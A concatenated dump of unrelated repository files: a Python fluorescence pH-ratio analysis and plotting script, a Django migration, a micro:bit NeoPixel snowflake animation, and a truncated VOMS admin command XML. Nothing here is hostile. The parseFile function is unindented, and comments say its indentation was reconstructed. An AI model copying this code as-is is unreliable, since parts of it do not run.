    # ``self`` is undefined in this module-level function, so every call raised
    # NameError immediately after printing. Those lines are removed here;
    # clearing the entry widgets belongs in the GUI callback that calls this
    # helper. The computed value is now also returned for programmatic use.
    result = get_pH(R, S)
    print(result)
    return result
def parseFile(Dir, File):
#Parse a CSV file of the full time, intensity, and background data and save as seperate csv files of the desired bkg and intensities
#for each individually exported group of data, not the session as a whole (D1, D2, etc)
Parser(Dir, File)
#
def Indiv_Ratios(D1file,D2file,bkg1,bkg2,cNum,legd,titl):
    # Plot background-corrected (D1-D2)/(D1+D2) ratios for each measurement
    # index, colored by concentration.
    #   D1file/D2file: 2-D arrays of 514nm / 550nm intensity measurements
    #   bkg1/bkg2:     2-D arrays of background measurements (half as many)
    #   cNum:          number of concentrations/iterations to split into
    #   legd:          NOTE(review): unused — legend labels are hard-coded below
    #   titl:          plot title
    #Assign the lengths of columns and rows to a value
    Dcols = len(D1file[0,:])
    Drows = len(D1file[:,0])-1 #rows are always over counted by 1 due to 0-indexing
    rTotal = Drows*10
    bkgCols = len(bkg1[0,:])
    #Set up lists to store values solved for in the for loop
    D1bkg = [None] * bkgCols
    D2bkg = [None] * bkgCols
    #Take means of background file columns, as there are half the number of background measurements
    #as there are fluorescein intensity measurements. This is just each column's mean value
    for jj in range(bkgCols):
        D1bkg[jj] = np.mean(bkg1[:,jj], dtype=np.float64)
        D2bkg[jj] = np.mean(bkg2[:,jj], dtype=np.float64)
    #Background files must be resized so that every 5 values (assigned to each concentration) can be taken for a mean
    D1bkg = np.array(D1bkg)
    D1meanBkg = np.mean(D1bkg.reshape(-1,5), axis=1)
    D2bkg = np.array(D2bkg)
    D2meanBkg = np.mean(D2bkg.reshape(-1,5), axis=1)
    #Set up counters so the loop ahead can keep all the indexes on track, and set up empty arrays
    ratTot = Dcols*Drows  # NOTE(review): unused below
    ratios = np.array([])
    D1use = np.array([])
    D2use = np.array([])
    bkgIndex = 0
    count = 1
    countr = 0
    countT = 0
    #
    #Loop to subtract the background from D1 & D2, and to solve for ratios of each concentration mean.
    #bkgIndex advances every 10 columns so each block of 10 columns shares one background mean.
    for cc in range(Dcols):
        if count % 10 == 1:
            bkgIndex = bkgIndex+1
        for rr in range(Drows):
            D1use = np.append(D1use, (D1file[rr,cc]-D1meanBkg[bkgIndex-1]))
            D2use = np.append(D2use, (D2file[rr,cc]-D2meanBkg[bkgIndex-1]))
            result = (D1use[countT+countr]-D2use[countT+countr]) / (D1use[countT+countr]+D2use[countT+countr])
            ratios = np.append(ratios, result)
            #
            countr = countr+1
        # NOTE(review): countT is set to cc*Drows AFTER processing column cc,
        # so the next column indexes one block too early — looks like it
        # should be (cc+1)*Drows; confirm against a known-good dataset.
        countT = cc*Drows
        countr = 0
        count = count+1
    #Split up the ratio values by concentration: each concentration gets a
    #slice of rTotal consecutive ratios (the first element of each block is skipped).
    val2 = 1
    sub_RatList = [None]*cNum
    sub_RatRange = [None]*cNum
    ratList = [None]*cNum
    ratRange = [None]*cNum
    for tt in range(cNum):
        sub_RatList[tt] = ratios[(tt*rTotal+1):(val2*rTotal)]
        sub_RatRange[tt] = xrange((tt*rTotal+1),(val2*rTotal))
        ratList[tt] = sub_RatList[tt]
        ratRange[tt] = sub_RatRange[tt]
        val2=val2+1
    #plot everything up individually such that the colors can be changed.
    #The legend has to be manually altered as the concentrations change from measurement to measurement
    #NOTE(review): colorInd has 17 entries; cNum larger than that would raise IndexError.
    colorInd = ['ro','bo','ko','mo','yo','go','co','ro','bo','ko','mo','yo','go','co','ro','bo','ko']
    f, fig1 = plt.subplots()
    for hh in range(cNum):
        fig1.plot(ratRange[hh],ratList[hh],colorInd[hh])
    #fig1.plot(R7,rat7,'yo')
    fig1.set_xlabel('Index', fontsize=15)
    fig1.set_ylabel('Ratio', fontsize=15)
    fig1.set_title(titl, fontsize=18)
    #fig1.legend(['1:100','1:200','1:300','1:400'],numpoints=1,loc=3,frameon=False)
    fig1.legend(['0M','1uM','30uM','100uM','300uM','1mM','3mM','5mM','7.5mM','10mM','15mM','30mM','100mM','200mM'], numpoints=1, loc=4, frameon=False)
def Mean_Ratios(D1file,D2file,bkg1,bkg2,cNum,legd,titl1,titl2):
    """Average the D1/D2 (514 nm / 550 nm) fluorescein intensity data,
    background-correct it, compute the intensity ratio per concentration
    with propagated errors, convert each ratio to a pH via get_pH(), and
    plot ratio-vs-concentration and pH-vs-concentration figures.

    D1file/D2file: 2-D arrays, one column per 16-sample measurement set.
    bkg1/bkg2:     matching background measurement arrays.
    cNum:          number of solute concentrations (= number of ratio points).
    legd:          legend label (currently unused; legends are hard-coded below).
    titl1/titl2:   titles for the ratio and pH figures.

    NOTE(review): the source indentation was lost upstream; the nesting in
    this block is a reconstruction consistent with the data flow.
    """
    #Function to find the means of all the D1 and D2 intensity data found by measuring the 514nm and 550nm
    #emission of fluorescein. This data is taken as 10 sets of 16 measurements for each concentration of surfactant.
    #The mean of each 16 measurements is taken, and the std dev found. the mean of these 10 means is then taken, and
    #its stdev is found.
    Dcols = len(D1file[0,:])
    Drows = len(D1file[:,0])-1  # NOTE(review): computed but never used below
    bkgCols = len(bkg1[0,:])
    #Set up matrices to store data in loop. This isn't the most eficient way, but it works for now.
    D1meanList = [None] * Dcols
    D2meanList = [None] * Dcols
    D1stdList = [None] * Dcols
    D2stdList = [None] * Dcols
    D1bkg = [None] * bkgCols
    D2bkg = [None] * bkgCols
    #Loop to take means and std dev of each column of intensity data
    for i in range(Dcols):
        D1meanList[i] = np.mean(D1file[:,i], dtype=np.float64)
        D2meanList[i] = np.mean(D2file[:,i], dtype=np.float64)
        D1stdList[i] = np.std(D1file[:,i])
        D2stdList[i] = np.std(D2file[:,i])
    #Loop to take mean of background data
    for k in range(bkgCols):
        D1bkg[k] = np.mean(bkg1[:,k], dtype=np.float64)
        D2bkg[k] = np.mean(bkg2[:,k], dtype=np.float64)
    #I need to take the mean of the first 10 values, then the next 5, then the next 10 and so on, so I must reshape the array
    #by first making them arrays and then spliting them up into fives where the first 2 sets of 5 are intensity data, and
    #every third set of five values is the corresponding background
    D1bkg = np.array(D1bkg)
    D1meanbkg = np.mean(D1bkg.reshape(-1,5), axis=1)
    D2bkg = np.array(D2bkg)
    D2meanbkg = np.mean(D2bkg.reshape(-1,5), axis=1)
    # Collapse each group of 10 set-means (and set-stds) into one value per
    # concentration.
    D1meanList = np.array(D1meanList)
    D1mean = np.mean(D1meanList.reshape(-1,10), axis=1)
    D2meanList = np.array(D2meanList)
    D2mean = np.mean(D2meanList.reshape(-1,10), axis=1)
    D1stdList = np.array(D1stdList)
    D1std = np.mean(D1stdList.reshape(-1,10), axis=1)
    D2stdList = np.array(D2stdList)
    D2std = np.mean(D2stdList.reshape(-1,10), axis=1)
    #Correct intensity data for the background and add the std devs in quadriture
    CorD1 = D1mean-D1meanbkg
    CorD2 = D2mean-D2meanbkg
    D1sqr = np.power(D1std,2)
    D2sqr = np.power(D2std,2)
    DstdAdd = np.sqrt(D1sqr+D2sqr)
    #More matrices
    DstdRat = [None] * cNum
    ratio = [None] * cNum
    topE = [None] * cNum
    botE = [None] * cNum
    #Loop to find the ratio and its errorbars above and below based on the number of iterations or solute concentrations (Cnum)
    for j in range(cNum):
        # Normalised-difference ratio; uncertainty propagated from the
        # combined channel std devs of both the sum and the difference.
        ratio[j] = (CorD1[j]-CorD2[j]) / (CorD1[j]+CorD2[j])
        topE[j] = np.power((DstdAdd[j] / (CorD1[j]+CorD2[j])),2)
        botE[j] = np.power((DstdAdd[j] / (CorD1[j]-CorD2[j])),2)
        DstdRat[j] = np.sqrt(topE[j] + botE[j])*abs(ratio[j])
    print('\n')
    print('Ratios\n')
    print(ratio)
    print('\n')
    print('Standard Deviations\n')
    print(DstdRat)
    print('\n')
    #
    R = len(ratio)
    pHresults = [None] * R
    devR = [None] * R
    devL = [None] * R
    #Loop to use the get_pH script written by Kieran to find the probabilistic pH and save outputs as printable strings
    #Errorstate gets rid of inevitable errors which accompany values not supported by the ratio curve found in the calibration
    for kk in range(R):
        with np.errstate(divide='ignore', invalid='ignore'):
            result = get_pH(ratio[kk],DstdRat[kk],plot=False)
        pHresults[kk] = result[0]
        devL[kk] = result[1]
        devR[kk] = result[2]
    #These are to be changed each time new data is taken and used to reflect the concentrations and spot check values
    concList = [0.00001,0.001,0.01,0.03,0.1,0.3,1,3,5,7,10,30,100,200,0.00001,0.001,0.03,0.1,0.3,1,3,5,7.5,10,15,30,100,200] #28 values: two series of 14 concentrations
    #concPlot = [0.001,0.3,30]
    #repResults = [results[15],results[15],results[15]]
    print('\n')
    print('pHs\n')
    print(pHresults)
    print('\n')
    print('Lower pH std. deviations\n')
    print(devL)
    print('\n')
    print('Upper pH std. deviations\n')
    print(devR)
    print('\n')
    print('Concentrations\n')
    print(concList)
    print('\n')
    #Set up for plotting as subplots so I can add things on top if I do spot checks later.
    f, fig = plt.subplots()
    plt.xscale('log')
    f2, fig2 = plt.subplots()
    plt.xscale('log')
    #If statement for the repeating of old points to check accuracy
    Repeat=False
    if Repeat==True:
        # NOTE(review): concPlot and repResults are commented out above, so
        # enabling Repeat as-is would raise a NameError — restore them first.
        fig.errorbar(concPlot,ratio[14:cNum],DstdRat[14:cNum], fmt='ro', linewidth=1.5)
        fig2.errorbar(concPlot,repResults,yerr=[devL[14:cNum], devR[14:cNum]], fmt='ro', linewidth=1.5)
    #xScale is changed every time new data is taken. Could add to GUI at some point?
    fig.errorbar(concList[0:14],ratio[0:14],DstdRat[0:14], fmt='bo', linewidth=1.5, label='Repeated Series')
    fig.errorbar(concList[14:cNum],ratio[14:cNum],DstdRat[14:cNum], fmt='r^', linewidth=1.5, label='Original Series')
    fig.set_xlim([0.000001,1000])
    fig.set_xlabel('Concentration (%)', fontsize=15)
    fig.set_ylabel('Ratio', fontsize=15)
    fig.set_title(titl1, fontsize=18)
    plt.grid()
    #
    fig2.errorbar(concList[0:14],pHresults[0:14],yerr=[devL[0:14], devR[0:14]], fmt='k^', linewidth=1.5, label='Repeated Series')
    fig2.errorbar(concList[14:cNum],pHresults[14:cNum],yerr=[devL[14:cNum], devR[14:cNum]], fmt='r^', linewidth=1.5, label='Original Series')
    fig2.set_xlabel('Concentration (%)', fontsize=15)
    fig2.set_ylabel('pH', fontsize=15)
    fig2.set_xlim([0.000001,1000])
    fig2.set_title(titl2, fontsize=18)
    #plt.grid()
    #
    #if legd != '': fig.legend(numpoints=1)
    fig.legend(numpoints=1, loc=2)
    #fig2.legend(numpoints=1, loc=2)
def plot_Gen(e1,e2,e3,e4,e5,e6,e7,e8,L2,eColor):
    """Plot one column of a text data file against another, with optional
    error bars and an optional marker-style split partway through the rows.

    e1:     path to a whitespace-delimited text file (read with np.loadtxt).
    e2/e3:  column indices of the x and y data.
    e4:     column index of the std-dev column, or '' when there is none.
    e5, L2: legend labels ('' to omit; L2 is an optional second entry).
    e6/e7/e8: x-axis label, y-axis label, title.
    eColor: row index at which the marker style switches, or '' for no split.
    """
    datalist = np.loadtxt(e1)
    rowTot = len(datalist[:,0])
    fig, ax0 = plt.subplots()
    xCol = datalist[:,e2]
    yCol = datalist[:,e3]
    # FIX: only extract the std-dev column when one was supplied. The
    # original indexed datalist[:,e4] unconditionally, which raised
    # whenever the caller passed e4 == '' to signal "no error bars".
    stdCol = datalist[:,e4] if e4 != '' else None
    if eColor != '':
        if e4 != '':
            # Error-bar plot, split at eColor to change the marker style.
            ax0.errorbar(xCol[0:eColor],yCol[0:eColor],stdCol[0:eColor],fmt='k^')
            ax0.errorbar(xCol[eColor:rowTot],yCol[eColor:rowTot],stdCol[eColor:rowTot],fmt='ko')
        else:
            # FIX: split the plain plot at eColor as well — the original
            # plotted the full series twice with different markers, which
            # hid the intended style change.
            ax0.plot(xCol[0:eColor],yCol[0:eColor],'k^')
            ax0.plot(xCol[eColor:rowTot],yCol[eColor:rowTot],'ko')
    else:
        if e4 != '':
            ax0.errorbar(xCol,yCol,stdCol,fmt='k^',linewidth=1.5)
        else:
            ax0.plot(xCol,yCol,'bo')
    # Legend: one or two entries depending on whether L2 was given.
    if e5 != '' and L2 == '':
        ax0.legend([e5], numpoints=1)
    if e5 != '' and L2 != '':
        ax0.legend([e5,L2], numpoints=1)
    ax0.set_xlabel(e6, fontsize=15)
    ax0.set_ylabel(e7, fontsize=15)
    ax0.set_title(e8, fontsize=18)
def mean_Gen(meanFile,Leg,xLab,yLab,Titl):
    """Plot per-column means (with std-dev error bars) of a text data file
    against a hard-coded concentration list, on a log x axis.

    meanFile: path readable by np.loadtxt.
    Leg:      legend label ('' to omit — an empty legend can raise).
    xLab/yLab/Titl: axis labels and figure title.

    NOTE: `concent` below is hard-coded to 4 values, so the input file is
    expected to have exactly 4 columns; errorbar() fails otherwise.
    """
    meanData = np.loadtxt(meanFile)
    cols = len(meanData[0,:])
    # (Removed unused locals `rows` and `xscale` from the original.)
    meanVal = [None] * cols
    stdVal = [None] * cols
    for i in range(cols):
        meanVal[i] = np.mean([meanData[:,i]], dtype=np.float64)
        stdVal[i] = np.std([meanData[:,i]])
    #Concentration values subject to manual change in the code
    concent = [2,1,0.5,0.1]
    f, ax1 = plt.subplots()
    ax1.errorbar(concent,meanVal,stdVal,fmt='ko',linewidth=1.5)
    plt.xscale('log')
    ax1.set_xlabel(xLab, fontsize=18)
    ax1.set_ylabel(yLab, fontsize=18)
    ax1.set_title(Titl, fontsize=15)
    ax1.set_xlim(0.05,3)
    #throws error if a blank legend is assigned occasionally.
    if Leg != '':
        ax1.legend([Leg], numpoints=1)
"noreply@github.com"
] | TrevorDemille.noreply@github.com |
15779835a64dfa759bd9410bf9661ec5cf78f3aa | 9a1538123b8abec14410dad46c437cf735684dd9 | /product/migrations/0018_productproperty_value_type.py | 48a0a691e24e11ea5cedf4a2158c7c000f223fd6 | [] | no_license | asmuratbek/zastroy24 | deec6bd65229aeb29eb313d915c6c47ca036a8aa | d68ce21beefc644752a1271a4d8981cd2423afba | refs/heads/master | 2020-04-27T18:44:26.845151 | 2019-03-08T18:09:13 | 2019-03-08T18:09:13 | 174,585,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-24 09:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: adds an optional unit-of-measure
    # field to the ProductProperty model. The escaped '\u04xx' strings are
    # Russian labels ("Например, кг" / "Единица измерения").

    # Must run after migration 0017 of the `product` app.
    dependencies = [
        ('product', '0017_auto_20171224_1536'),
    ]

    operations = [
        # `value_type` is nullable so existing rows need no default.
        migrations.AddField(
            model_name='productproperty',
            name='value_type',
            field=models.CharField(help_text='\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0433', max_length=255, null=True, verbose_name='\u0415\u0434\u0438\u043d\u0438\u0446\u0430 \u0438\u0437\u043c\u0435\u0440\u0435\u043d\u0438\u044f'),
        ),
    ]
| [
"asmuratbek@gmail.com"
] | asmuratbek@gmail.com |
40b1899801acd45a1f375f49968cfbaef05ad3e5 | 463761fd2c7901832a2c0e0e9f5c69cdc8367a46 | /snowflake_microbit/mb_snowflake.py | c2db8d7bb46bb401c6dc873d04314bfa96791bc7 | [
"Apache-2.0"
] | permissive | micropython-Chinese-Community/fun | ed8a5eb41f92f6c569f0493e81798a536dfd000f | db63632fbbb345bc8c9198e61f18c286abdac61c | refs/heads/master | 2020-04-10T15:21:46.271844 | 2018-12-11T16:13:35 | 2018-12-11T16:13:35 | 161,106,982 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,549 | py | from microbit import pin1, sleep, reset
from neopixel import NeoPixel
from random import randint
import gc
pileup=1  # 1: landed flakes accumulate at the bottom; 0: they just vanish
TH=2      # brightness threshold at which a pile cell counts as "full"
perc=50   # spawn chance per tick: new flakes appear when rand(100) <= perc
mpt=1     # number of flakes spawned per successful tick
snow = []  # active flakes, each a mutable [row, col, brightness] list
# Pile state for display rows 12-15 plus one always-full sentinel row
# (initialised to TH) acting as the ground.
pile = [[0]*16,[0]*16,[0]*16,[0]*16,[TH]*16]
# 16x16 NeoPixel matrix on pin1 (256 LEDs, serpentine wiring).
# NOTE(review): the name `np` shadows the usual numpy alias — here it is
# the pixel buffer, not numpy.
np = NeoPixel(pin1, 256)
def rand(n):
    """Return a uniform random integer in the range [0, n-1]."""
    upper_bound = n - 1
    return randint(0, upper_bound)
def set(row, col, color):
    """Write `color` to matrix cell (row, col).

    Maps 2-D coordinates onto the serpentine LED strip: odd columns run
    bottom-to-top, even columns top-to-bottom. (Name shadows the builtin
    `set`; kept for compatibility with existing callers.)
    """
    if col % 2:
        offset = 15 - row
    else:
        offset = row
    np[col * 16 + offset] = color
def get(row, col):
    """Read the color tuple at matrix cell (row, col).

    Inverse of set(): applies the same serpentine index mapping (odd
    columns reversed) before reading the strip buffer.
    """
    if col % 2:
        offset = 15 - row
    else:
        offset = row
    return np[col * 16 + offset]
def ColorOverlay(row, col, color, add):
    """Blend `color` onto pixel (row, col) channel-wise.

    When `add` is truthy the channels are added to the current pixel
    value; otherwise they are subtracted (used to erase a prior overlay).
    """
    current = get(row, col)
    sign = 1 if add else -1
    blended = [chan + sign * delta for chan, delta in zip(current, color)]
    set(row, col, blended)
def showimg(dat):
    """Unpack a 9x8 array of words onto the 16x16 matrix.

    Each word in `dat` packs two 12-bit RGB pixels (4 bits per channel):
    the low 12 bits fill the first pixel, the high 12 bits the second.
    """
    for x in range(9):
        for y in range(8):
            word = dat[x * 8 + y]
            np[x * 16 + 15 - y * 2] = (word & 0xF, (word >> 4) & 0xF, (word >> 8) & 0xF)
            np[x * 16 + 14 - y * 2] = ((word >> 12) & 0xF, (word >> 16) & 0xF, (word >> 20) & 0xF)
def _line():
    # Handle a completed bottom pile row: flash it red, then shift the whole
    # pile down one row (Tetris-style line clear).
    # NOTE(review): source indentation was lost upstream; this nesting is a
    # reconstruction consistent with the data flow — confirm against upstream.
    #
    # Bail out unless every cell of the bottom pile row (display row 15) is full.
    for i in range(16):
        if pile[3][i]<TH:
            return
    # Flash the bottom display row red for 300 ms.
    for i in range(16):
        ColorOverlay(15,i,[16,0,0],1)
    np.show()
    sleep(300)
    for i in range(16):
        ColorOverlay(15,i,[16,0,0],0)
    # Shift pile rows down: display rows 15..13 each take the contents of the
    # row above, erasing/redrawing the white pile pixels as needed.
    for j in range(3):
        for i in range(16):
            if pile[3-j][i]>=TH:
                ColorOverlay(15-j,i,[8,8,8],0)
            pile[3-j][i]=pile[2-j][i]
            if pile[3-j][i]>=TH:
                ColorOverlay(15-j,i,[8,8,8],1)
    # Clear the drawn pixels of the now-duplicated top pile row and reset it.
    for i in range(16):
        if pile[0][i]>=TH:
            ColorOverlay(12,i,[8,8,8],0)
    pile[0]=[0]*16
def _del():
    # Remove flakes that have finished falling. With pileup enabled a flake
    # sticks when the pile cell directly below it is full and both horizontal
    # neighbours of that cell are full too (matrix edges count as full); its
    # brightness is then accumulated into the pile. Iterating from the end of
    # `snow` keeps pop() from shifting unvisited entries.
    # NOTE(review): source indentation was lost upstream; this nesting is a
    # reconstruction consistent with the data flow — confirm against upstream.
    n = len(snow)
    if pileup:
        for i in range(n):
            c = snow[n-1-i]
            row = c[0]
            col = c[1]
            # Pile only spans display rows 12-15 (pile rows indexed via row-11).
            if row<12:
                continue
            # a/b: left/right neighbour of the cell below is full? Edges = full.
            if col == 0:
                a = 1
                b = pile[row-11][col+1]>=TH
            elif col == 15:
                a = pile[row-11][col-1]>=TH
                b = 1
            else:
                a = pile[row-11][col-1]>=TH
                b = pile[row-11][col+1]>=TH
            # The cell directly below is full: the flake lands here.
            if pile[row-11][col]>=TH:
                # Erase the falling-flake pixel.
                ColorOverlay(c[0],c[1],[c[2],c[2],c[2]],0)
                if a and b:
                    # Accumulate brightness into this pile cell; draw it white
                    # only when it first crosses the "full" threshold.
                    if pile[row-12][col]<TH:
                        pile[row-12][col]+=c[2]
                        if pile[row-12][col]>=TH:
                            ColorOverlay(c[0],c[1],[8,8,8],1)
                    # A landing may have completed the bottom row.
                    _line()
                snow.pop(n-1-i)
    else:
        # No pile-up: flakes simply disappear once past the bottom row.
        for i in range(n):
            c = snow[n-1-i]
            if c[0] > 14:
                ColorOverlay(c[0],c[1],[c[2],c[2],c[2]],0)
                snow.pop(n-1-i)
def _new():
    """Possibly spawn new flakes: when rand(100) <= perc, append `mpt`
    flakes just above the top row with a random column and brightness."""
    if rand(100) > perc:
        return
    for _ in range(mpt):
        # [row, col, brightness]; row -1 so the first fall step lands on row 0.
        snow.append([-1, rand(16), rand(15) + 1])
def _fall():
    """Advance every flake one row down with a random sideways drift.

    Each flake is erased from its old cell (unless still above the top
    row), moved down one row and -1/0/+1 columns (clamped to 0..15), and
    redrawn at its new cell.
    """
    for flake in snow:
        if flake[0] > -1:
            ColorOverlay(flake[0], flake[1], [flake[2], flake[2], flake[2]], 0)
        flake[0] += 1
        drift = 1 - rand(3)
        flake[1] = min(max(flake[1] + drift, 0), 15)
        ColorOverlay(flake[0], flake[1], [flake[2], flake[2], flake[2]], 1)
def snowflake():
    """Main animation loop: move flakes, render, land them, maybe spawn
    new ones, then sleep and collect garbage — forever."""
    while True:
        if snow:
            _fall()
            np.show()
            _del()
        _new()
        sleep(50)
        gc.collect()
# Packed splash-screen image: 72 words, each holding two 12-bit RGB pixels
# (low 12 bits = first pixel, high 12 bits = second), consumed by showimg().
npd=[
0x000000, 0x060000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x0A0000, 0x060000, 0x000060, 0x000000,
0x000000, 0x060000, 0x060060, 0x0A00A0,
0x0F0000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x0F0000, 0x0A00F0,
0x0A00A0, 0x060060, 0x000060, 0x000000,
0x024024, 0x060024, 0x060060, 0x0A00A0,
0x0F00A0, 0x0F00F0, 0x000000, 0x000000,
0x000000, 0x000000, 0x0F0000, 0x0A00F0,
0x0A00A0, 0x060060, 0x000060, 0x000000,
0x000000, 0x060000, 0x060060, 0x0A00A0,
0x0F0000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x0A0000, 0x060000, 0x000060, 0x000000,
0x000000, 0x060000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
]
showimg(npd)
# Free the splash data and the one-shot helper before the animation starts
# (RAM is scarce on the micro:bit).
del npd
del showimg
gc.collect()
# Run the animation forever; on any exception (including KeyboardInterrupt)
# reboot the board instead of dropping to the REPL.
try:
    snowflake()
except:
    reset()
"shaoziyang@126.com"
] | shaoziyang@126.com |
bea6050990dc01a93c86eef796bdd5a4f042ad4f | dccbf522ddbaf9025a41a7375679a7188bcb9ab0 | /category/forms.py | 69aeec12910453b17723e5f8c0a4974c3b203487 | [] | no_license | junghwan1224/django_study | a2cd748fd0a60ac83b13778da31e8208b276bd0a | 67c1f7181b2353882d1e2576cd5ffb116dec36fb | refs/heads/master | 2020-04-21T11:31:30.222650 | 2019-03-01T06:41:44 | 2019-03-01T06:41:44 | 169,528,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 492 | py | from django import forms
from django_summernote.widgets import SummernoteWidget
from .models import Post
from .models import Comment
class PostForm(forms.ModelForm):
    """ModelForm for Post with a rich-text (Summernote) body field."""

    # Rich-text editor widget for the body; empty label hides the caption.
    content = forms.CharField(widget=SummernoteWidget(), label='')

    class Meta:
        model = Post
        # These fields are excluded from the form — presumably populated by
        # the view/model (e.g. author from request.user); verify against callers.
        exclude = ('author', 'post_status', 'created_at', 'updated_at', 'apply_user',)
class CommentForm(forms.ModelForm):
    """ModelForm for Comment exposing only the user-editable fields."""

    class Meta:
        model = Comment
        # Excluded fields are presumably filled in by the view (author from
        # the request, post from the URL); verify against callers.
        exclude = ('author', 'created_at', 'post',)
| [
"aorwn212@naver.com"
] | aorwn212@naver.com |
5abc08ddf1f3216fa1ab6d4e58da02ac53e7e1df | ffd7b823905e1db0462e39017414dbef8bdf8c21 | /src/VOMSAdmin/VOMSCommandsDef.py | b33b66a3a619e4befd8150f043302b8e34a983db | [
"Apache-2.0"
] | permissive | AlbertoPeon/voms-admin-client | 3dd7cd2d71b3c5591dbd96ccca950d460071320d | e628a8e09acc19a106d325154706f300d7651a42 | refs/heads/master | 2021-01-15T17:21:24.956019 | 2012-04-14T08:17:42 | 2012-04-14T08:17:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,610 | py | #
# Copyright (c) Members of the EGEE Collaboration. 2006-2009.
# See http://www.eu-egee.org/partners/ for details on the copyright holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Andrea Ceccanti (INFN)
#
commands_def="""<?xml version="1.0" encoding="UTF-8"?>
<voms-commands>
<command-group
name="User management commands"
shortname="user">
<command
name="list-users">
<description>list-users</description>
<help-string
xml:space="preserve">
Lists the VO users.</help-string>
</command>
<command
name="list-suspended-users">
<description>list-suspended-users</description>
<help-string
xml:space="preserve">
Lists the VO users that are currently suspended. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="list-expired-users">
<description>list-expired-users</description>
<help-string
xml:space="preserve">
Lists the VO users that are currently expired. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="count-expired-users">
<description>count-expired-users</description>
<help-string
xml:space="preserve">
Prints how many VO users are currently expired. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="count-suspended-users">
<description>count-suspended-users</description>
<help-string
xml:space="preserve">
Counts how many VO users are currently suspended. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="count-users">
<description>count-users</description>
<help-string
xml:space="preserve">
Counts how many users are in the VO. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="list-user-stats">
<description>list-user-stats</description>
<help-string
xml:space="preserve">
List users statistics for this VO. (Requires VOMS Admin server >= 2.7.0)</help-string>
</command>
<command
name="create-user">
<description>create-user CERTIFICATE.PEM</description>
<help-string
xml:space="preserve">
Registers a new user in VOMS.
If you use the --nousercert option, then four parameters are
required (DN CA CN MAIL) to create the user.
Otherwise these parameters are extracted automatically from the
certificate.
Examples:
voms-admin --vo test_vo create-user .globus/usercert.pem
voms-admin --nousercert --vo test_vo create-user \
'My DN' 'My CA' 'My CN' 'My Email'</help-string>
<arg
type="X509" />
</command>
<command
name="delete-user">
<description>delete-user USER</description>
<help-string
xml:space="preserve">
Deletes a user from VOMS, including all their attributes
and membership information.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.
Examples:
voms-admin --vo test_vo delete-user .globus/usercert.pem
voms-admin --nousercert --vo test_vo delete-user \
'My DN' 'MY CA'</help-string>
<arg
type="User" />
</command>
</command-group>
<command-group
name="Role management commands"
shortname="role">
<command
name="list-roles">
<description>list-roles</description>
<help-string
xml:space="preserve">
Lists the roles defined in the VO.</help-string>
</command>
<command
name="create-role">
<description>create-role ROLENAME</description>
<help-string
xml:space="preserve">
Creates a new role</help-string>
<arg
type="Role" />
</command>
<command
name="delete-role">
<description>delete-role ROLENAME</description>
<help-string
xml:space="preserve">
Deletes a role.</help-string>
<arg
type="Role" />
</command>
</command-group>
<command-group
name="Group management commands"
shortname="group">
<command
name="list-groups">
<description>list-groups</description>
<help-string
xml:space="preserve">
Lists all the groups defined in the VO.</help-string>
</command>
<command
name="list-sub-groups">
<description>list-sub-groups GROUPNAME</description>
<help-string
xml:space="preserve">
List the subgroups of GROUPNAME.</help-string>
<arg
type="Group" />
</command>
<command
name="create-group">
<description>create-group GROUPNAME</description>
<help-string xml:space="preserve">
Creates a new group named GROUPNAME.
Note that the vo root group part of the fully qualified group name
can be omitted, i.e., if the group to be created is called /vo/ciccio,
where /vo is the vo root group, this command accepts both the "ciccio"
and "/vo/ciccio" syntaxes.</help-string>
<arg
type="Group" />
</command>
<command
name="delete-group">
<description>delete-group GROUPNAME</description>
<help-string
xml:space="preserve">
Deletes a group.</help-string>
<arg
type="Group" />
</command>
<command
name="list-user-groups">
<description>list-user-groups USER</description>
<help-string xml:space="preserve">
Lists the groups that USER is a member of. USER is either
an X509 certificate file in PEM format, or a DN, CA couple when the
--nousercert option is set.</help-string>
<arg
type="User" />
</command>
</command-group>
<command-group
name="Group membership management commands"
shortname="membership">
<command
name="add-member">
<description>add-member GROUPNAME USER</description>
<help-string xml:space="preserve">
Adds USER to the GROUPNAME group.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="User" />
</command>
<command
name="remove-member">
<description>remove-member GROUPNAME USER</description>
<help-string xml:space="preserve">
Removes USER from the GROUPNAME group.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="User" />
</command>
<command
name="list-members">
<description>list-members GROUPNAME</description>
<help-string
xml:space="preserve">
Lists all members of a group.</help-string>
<arg
type="Group" />
</command>
</command-group>
<command-group
name="Role assignment commands"
shortname="role-assign">
<command
name="assign-role">
<description>assign-role GROUPNAME ROLENAME USER</description>
<help-string xml:space="preserve">
Assigns role ROLENAME to user USER in group GROUPNAME.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="User" />
